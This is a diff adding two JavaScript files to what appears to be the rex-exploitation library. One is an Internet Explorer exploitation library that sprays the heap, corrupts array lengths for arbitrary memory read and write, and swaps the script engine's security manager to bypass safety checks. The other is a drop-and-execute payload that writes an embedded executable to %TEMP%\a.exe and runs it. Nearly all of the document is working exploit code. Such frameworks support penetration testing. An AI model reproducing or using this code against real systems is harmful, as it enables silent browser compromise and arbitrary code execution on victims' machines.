rex-exploitation 0.1.0

data/data/js/memory/explib2/lib/explib2.js

@@ -0,0 +1,426 @@
+
+
+ExpLib = (function() {
+
+	function ExpLib( num_arrays, arr_size, base, payload ) {
+		this.arr1 = null;
+		this.arr2 = null;
+		this.base = base;
+		this.arr_size = arr_size;
+		this.arr_arr = null;
+		// Allows to control the contents of the sprayed memory.
+		// Have into account some array positions will be corrupted
+		// while leaking and modifying things.
+		this.arr_contents = [];
+
+		this.payload = payload;
+		this.modules = {}
+		this.getproc = null;
+		this.loadlibrary = null;
+
+		// Offset to the Origin URL in the Stream, modifying it
+		// allows to bypass msado15.SecurityCheck(), allowing
+		// for example to write stream contents to filesystem.
+		this.stream_origin = 0x44;
+	}
+
+	ExpLib.prototype.resolveAPI = function( modulename, procname ) {
+		var module  = this.resolveModule( modulename );
+
+		return this.callAPI( this.getproc, module, this.allocateString(procname) );
+	}
+
+	ExpLib.prototype.resolveModule = function( modulename ) {
+		if ( this.modules[modulename] )
+			return this.modules[modulename];
+
+		var module = this.callAPI( this.loadlibrary, this.allocateString(modulename) );
+		this.modules[modulename] = module;
+		return module;
+	}
+
+	ExpLib.prototype.spray = function() {
+		this.arr_arr = new Array( num_arrays );
+
+		var decl = "[";
+
+		for ( var i = 0; i < this.arr_size - 1; ++ i ) {
+			decl += '0,';
+		}
+
+		decl += '0';
+		decl += ']';
+
+		for ( var i = 0; i < num_arrays; ++ i ) {
+			this.arr_arr[i] = eval(decl);
+			for(var j = 0; j < this.arr_contents.length; j++) {
+				this.arr_arr[i][j] = this.arr_contents[j];
+			}
+		}
+
+  }
+
+	// Should be used before calling spray()
+	ExpLib.prototype.setArrContents = function(contents) {
+		for(var i = 0; i < this.arr_size && i < contents.length; i++) {
+			this.arr_contents[i] = contents[i];
+		}
+	}
+
+  ExpLib.prototype.setValue = function(i1, i2, v) {
+		this.arr_arr[i1][i2] = v;
+	}
+
+
+  ExpLib.prototype.setValueByAddr = function(index, addr, v) {
+		this.arr_arr[index][((addr % 0x1000) - 0x20) / 4] = v;
+	}
+
+	ExpLib.prototype.read32 = function(addr) {
+		if ( addr % 4 ) {
+			// error
+		}
+
+		if ( addr >= this.arr2_member_base ) {
+			return this.arr2[(addr - this.arr2_member_base)/4];
+		} else {
+			return this.arr2[0x40000000 - (this.arr2_member_base - addr)/4]
+		}
+	}
+
+	ExpLib.prototype.write32 = function(addr, value) {
+		if ( addr % 4 ) {
+			// error
+		}
+
+		if ( value >= 0x80000000 )
+			value = -(0x100000000 - value);
+
+		//alert(((addr - this.arr2_member_base)/4).toString(16));
+		if ( addr >= this.arr2_member_base ) {
+			this.arr2[(addr - this.arr2_member_base)/4] = value;
+		} else {
+			this.arr2[0x40000000 - (this.arr2_member_base - addr) / 4] = value;
+		}
+	}
+
+	ExpLib.prototype.read8 = function(addr) {
+		var value = this.read32( addr  & 0xfffffffc );
+		switch ( addr % 4 ) {
+			case 0: return (value & 0xff);
+			case 1: return ((value >> 8) & 0xff);
+			case 2: return ((value >> 16) & 0xff);
+			case 3: return ((value >> 24) & 0xff);
+		}
+
+		return 0;
+	}
+
+	ExpLib.prototype.write8 = function(addr, value) {
+		var original_value = this.read32( addr  & 0xfffffffc );
+		var new_value;
+
+		switch ( addr % 4 ) {
+			case 0:
+				new_value = (original_value & 0xffffff00) | (value & 0xff);
+				break;
+
+			case 1:
+				new_value = (original_value & 0xffff00ff) | ((value & 0xff) << 8);
+				break;
+			case 2:
+				new_value = (original_value & 0xff00ffff) | ((value & 0xff) << 16);
+				break;
+			case 3:
+				new_value = (original_value & 0x00ffffff) | ((value & 0xff) << 24);
+				break;
+		}
+
+
+		this.write32( addr  & 0xfffffffc, new_value );
+	}
+
+
+	ExpLib.prototype.writeBytes = function(addr, bytes) {
+		for ( var i = 0; i + 3 < bytes.length; i += 4 ) {
+			var value = (bytes[i] & 0xff) | ((bytes[i+1] & 0xff) << 8) |
+						((bytes[i + 2] & 0xff) << 16) | ((bytes[i + 3] & 0xff) << 24);
+
+			this.write32( addr + i, value );
+		}
+
+		for ( ; i < bytes.length; ++ i ) {
+			this.write8( addr + i, bytes[i] );
+		}
+	}
+
+	ExpLib.prototype.writeString = function(addr, s) {
+		var bytes = [];
+		var i = 0;
+		for ( ; i < s.length; ++ i ) {
+			bytes[i] = s.charCodeAt(i);
+		}
+
+		bytes[i] = 0;
+
+		this.writeBytes( addr, bytes );
+	}
+
+	ExpLib.prototype.writeStringW = function(addr, s) {
+		var bytes = [];
+		var i = 0;
+		for ( ; i < s.length; ++i ) {
+			bytes[i * 2] = s.charCodeAt(i);
+			bytes[i * 2 + 1] = 0;
+		}
+
+		bytes[s.length * 2] = 0;
+		bytes[s.length * 2 + 1] = 0;
+
+		this.writeBytes( addr, bytes );
+	}
+
+	ExpLib.prototype.read16 = function(addr) {
+		if ( addr % 2 ) {
+					// error, not aligned
+		}
+
+		var value = this.read32( addr  & 0xfffffffc );
+		switch ( addr % 4 ) {
+			case 0: return (value & 0xffff);
+			case 1: return ((value >> 8) & 0xffff);
+			case 2: return ((value >> 16) & 0xffff);
+			case 3: /*not supported*/ break;
+		}
+
+		return 0;
+	}
+
+	ExpLib.prototype.strequal = function(addr, s)  {
+		for ( var i = 0; i < s.length; ++ i ) {
+			if ( this.read8(addr + i) != s.charCodeAt(i) )
+				return false;
+		}
+
+		return true;
+	}
+
+
+	ExpLib.prototype.getModuleBase = function(addr) {
+
+		var cur_addr = addr;
+
+		while ( cur_addr > 0 ) {
+
+			if ( (this.read32(cur_addr) & 0xffff) == 0x5a4d ) {
+				return cur_addr;
+			}
+
+			cur_addr -= 0x10000;
+		}
+
+		return 0;
+	}
+
+
+
+	ExpLib.prototype.getModuleBaseFromIAT = function(base, name) {
+		var import_table = base + this.read32( base + this.read32(base + 0x3c) + 0x80 );
+		var cur_table = import_table;
+
+		while ( cur_table < import_table + 0x1000 ) {
+
+			var name_addr = base + this.read32(cur_table + 12);
+			if ( this.strequal( name_addr, name ) ) {
+				var iat = base + this.read32(cur_table + 16);
+				var func = this.read32(iat);
+				while ( 0 == func ) {
+					iat += 4;
+					func = this.read32(iat);
+				}
+
+				return this.getModuleBase( func & 0xFFFF0000 );
+
+			}
+
+			cur_table += 20;
+		}
+
+		return 0;
+	}
+
+	ExpLib.prototype.getProcAddress = function(base, procname)  {
+		var export_table = base + this.read32( base + this.read32(base + 0x3c) + 0x78 );
+		var num_functions = this.read32( export_table + 20 );
+		var addr_functions = base + this.read32( export_table + 28 );
+		var addr_names = base + this.read32( export_table + 32 );
+		var addr_ordinals = base + this.read32( export_table + 36 );
+
+		for ( var i = 0; i < num_functions; ++ i ) {
+			var name_addr = this.read32( addr_names + i * 4 ) + base;
+			if ( this.strequal( name_addr, procname ) ) {
+				var ordinal = this.read16( addr_ordinals + i * 2 );
+				var result = this.read32( addr_functions + ordinal * 4 ) + base;
+				return result;
+			}
+		}
+
+		return 0;
+	}
+
+	ExpLib.prototype.searchBytes = function(pattern, start, end)  {
+
+		if ( start >= end || start + pattern.length > end )
+			return 0;
+
+		var pos = start;
+		while ( pos < end ) {
+			for ( var i = 0; i < pattern.length; ++ i ) {
+				if ( this.read8(pos + i) != pattern[i] )
+					break;
+			}
+
+			if ( i == pattern.length ) {
+				return pos;
+			}
+
+			++ pos;
+		}
+
+		return 0;
+	}
+
+
+	ExpLib.prototype.getError = function(msg) {
+		return this.err_msg;
+	}
+
+	ExpLib.prototype.setError = function(msg) {
+		this.err_msg = msg;
+	}
+
+	ExpLib.prototype.setStreamOrigin = function(offset) {
+		this.stream_origin = offset;
+	}
+
+	ExpLib.prototype.getStreamOrigin = function() {
+		return this.stream_origin;
+	}
+
+	ExpLib.prototype.memcpy = function(dst, src, size) {
+		var i = 0;
+		for ( ; i < size - 4; i += 4 ) {
+			this.write32( dst + i, this.read32(src + i) );
+		}
+
+		for ( ; i < size; ++ i ) {
+			this.write8( dst + i, this.read8(src + i) );
+		}
+	}
+
+	ExpLib.prototype.go = function() {
+
+		var i = 0;
+
+
+
+		for ( ; i < this.arr_arr.length - 1; ++ i ) {
+			this.arr_arr[i][this.arr_size + 0x1c / 4] = 0;
+
+			if ( this.arr_arr[i][this.arr_size + 0x18 / 4] == this.arr_size ) {
+				this.arr_arr[i][this.arr_size + 0x14 / 4] = 0x3fffffff;
+				this.arr_arr[i][this.arr_size + 0x18 / 4] = 0x3fffffff;
+
+				this.arr_arr[i + 1].length = 0x3fffffff;
+
+				if ( this.arr_arr[i+1].length == 0x3fffffff ) {
+					break;
+				}
+			}
+
+		}
+
+		if ( i >= this.arr_arr.length - 1 ) {
+			this.setError( "Cannot find array with corrupt length!" );
+			return false;
+		}
+
+		this.arr1_idx = i;
+		this.arr2_idx = i + 1;
+
+		this.arr1 = this.arr_arr[i];
+		this.arr2 = this.arr_arr[i + 1];
+
+		this.arr2_base = this.base + 0x1000;
+		this.arr2_member_base = this.arr2_base + 0x20;
+
+		var func_addr = this.leakAddress(ActiveXObject);
+		var script_engine_addr = this.read32(this.read32(func_addr + 0x1c) + 4);
+
+		//alert(script_engine_addr.toString(16));
+
+		var original_securitymanager = this.read32( script_engine_addr + 0x21c );
+		if ( !original_securitymanager ) {
+			// let security manager to be valid
+			try {
+				var WshShell = new ActiveXObject("WScript.shell");
+			} catch (e) {}
+
+			original_securitymanager = this.read32( script_engine_addr + 0x21c );
+		}
+
+		var original_securitymanager_vtable = this.read32(original_securitymanager);
+		var securitymanager_size = 0x28;
+		var fake_securitymanager = 0x1a1b2010;
+		var fake_securitymanager_vtable = fake_securitymanager + 0x28;
+		//alert(original_securitymanager.toString(16));
+
+		this.memcpy( fake_securitymanager, original_securitymanager, securitymanager_size );
+		this.memcpy( fake_securitymanager_vtable, original_securitymanager_vtable, 0x70 );
+		this.write32( fake_securitymanager, fake_securitymanager_vtable );
+		this.write32(script_engine_addr + 0x21c, fake_securitymanager);
+
+		var jscript9_base = this.getModuleBase( this.read32(script_engine_addr) & 0xffff0000 );
+		var jscript9_code_start = jscript9_base + this.read32(jscript9_base + this.read32(jscript9_base + 0x3c) + 0x104);
+		var jscript9_code_end = jscript9_base + this.read32(jscript9_base + this.read32(jscript9_base + 0x3c) + 0x108);
+
+
+		this.write32( fake_securitymanager_vtable + 0x14,
+					 this.searchBytes( [0x8b, 0xe5, 0x5d, 0xc2, 0x08], jscript9_code_start, jscript9_code_end ) ); /* mov esp, ebp; pop ebp; ret 8; */
+
+		this.write32( fake_securitymanager_vtable + 0x10,
+					 this.searchBytes( [0x8b, 0xe5, 0x5d, 0xc2, 0x04], jscript9_code_start, jscript9_code_end ) ); /* mov esp, ebp; pop ebp; ret 4; */
+
+		this.payload.execute(this);
+
+
+		/*
+		* restore
+		*/
+
+		this.write32( script_engine_addr + 0x21c, original_securitymanager );
+
+		return true;
+
+	}
+
+	ExpLib.prototype.leakAddress = function(obj) {
+		this.arr_arr[this.arr2_idx + 1][2] = obj;
+		return this.read32(this.arr2_member_base + 0x1008);
+	}
+
+	ExpLib.prototype.switchStreamOrigin = function(stream) {
+		var obj = this.leakAddress(stream);
+		var stream_obj = this.read32(obj + 0x30);
+		//var url_addr = this.read32(stream_obj + 0x3c);
+		var url_addr = this.read32(stream_obj + this.stream_origin);
+
+		/*
+		* bypass domain check
+		*/
+		this.writeStringW( url_addr, 'file:///C:/1.htm' );
+	}
+
+	return ExpLib;
+
+})();

data/data/js/memory/explib2/payload/drop_exec.js

@@ -0,0 +1,33 @@
+function payload_drop_exec(pe) {
+
+	this.execute = function(explib) {
+
+		var WshShell = new ActiveXObject("WScript.shell");
+		var temp = WshShell.ExpandEnvironmentStrings("%TEMP%");
+		var filename = temp + "\\a.exe";
+
+		var bStream = new ActiveXObject("ADODB.Stream");
+		var txtStream = new ActiveXObject("ADODB.Stream");
+		bStream.Type = 1;
+		txtStream.Type = 2;
+
+		bStream.Open();
+		txtStream.Open();
+
+		explib.switchStreamOrigin(txtStream);
+
+		txtStream.WriteText(pe);
+		txtStream.Position = 2;
+		txtStream.CopyTo( bStream );
+		txtStream.Close();
+
+		explib.switchStreamOrigin(bStream);
+
+		bStream.SaveToFile(filename, 2);
+		bStream.Close();
+
+		oExec = WshShell.Exec(filename);
+	}
+
+	return this;
+}